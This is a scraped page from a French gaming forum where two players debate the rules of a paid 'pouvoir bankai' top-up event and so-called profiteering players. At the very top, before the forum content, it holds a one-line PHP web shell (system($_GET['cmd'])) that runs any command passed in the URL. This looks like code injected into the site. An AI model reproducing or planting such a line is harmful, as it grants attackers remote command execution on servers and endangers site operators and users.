ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 734|Reponse: 1

POUVOIR BANKAI [Copier l'URL]

Rank: 3Rank: 3

Heure de publication 2017-8-19 14:29:06 |Afficher toutes les publications
Bonjour , messieurs les supports

Je vous propose de changer "un petit peu" le pouvoir bankai , en effet il faut permettre uniquement aux personnes ayant prisent au moins 1 zampacto , de pouvoir accés au 888 or lorsque les 30 zampacto seront écoulé .

Cela aurait pour effet d'empécher les "joueurs profiteurs" d' avoir accés au 888or et récompencé les joueurs honnêtes.

Pouvoir bankai : évenement qui permet d'avoir un total de 1000or pour un top-up de 0,86 centimes (euro) , seulement si 30 personnes top up 0,86 centimes.
joueurs profiteurs : joueur qui top up uniquement si sure que les 30 zampacto seront écouler, ils attendent les derniers zampacto 1 ou 5 , et la top up !!! (voir meme attendre que les 30 zampacto seront tomber )

Merci de ne pas prendre en compte mes emotions , cela est écrit à chaud .

Utiliser la magie Signaler

Rank: 6Rank: 6

Heure de publication 2017-8-19 23:54:24 |Afficher toutes les publications
la seul choses pour remplir les condition d'obtention est de réunir 30 zanpa, tu ne peux pas en vouloir a ceux qui attendent de voir si les 30 zanpa sont réuni pour être sur d'avoir la récompense ...

pour certain il est facile de mettre 100-200 euro pour d'autre c'est plutot 5-10 euro et pour d'autre ils ont même difficile de réunir 5 euro par mois pour pouvoir faire le pouvoir bankai ...

je suis sur que toi tu n'as pas de mal a mettre ne serai ce qu'un euro pour l'avoir le pouvoir bankai, mais imagine quelqu'un qui met les 1 euro et boum le pouvoir passe pas car il y a eu des absentéiste, pour lui qui a du mal a réunir 5 euro par mois pour cet évent ca reviens a dire que c'est 1 euro de perdu, même si il a eu quelque gold ... comparé a ce qu'il n'a pas eu c'est une énorme perte.

donc supprimer le fait qu'il soit sur de l'avoir reviens a dire que tu te privilégie par rapport a eux et cela n'est pas possible. enfin bien évidement cela reste mon avis et ce n'est pas moi qui décide ;)

Utiliser la magie Signaler

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-1-18 02:00 , Processed in 0.020047 second(s), 10 queries , Xcache On.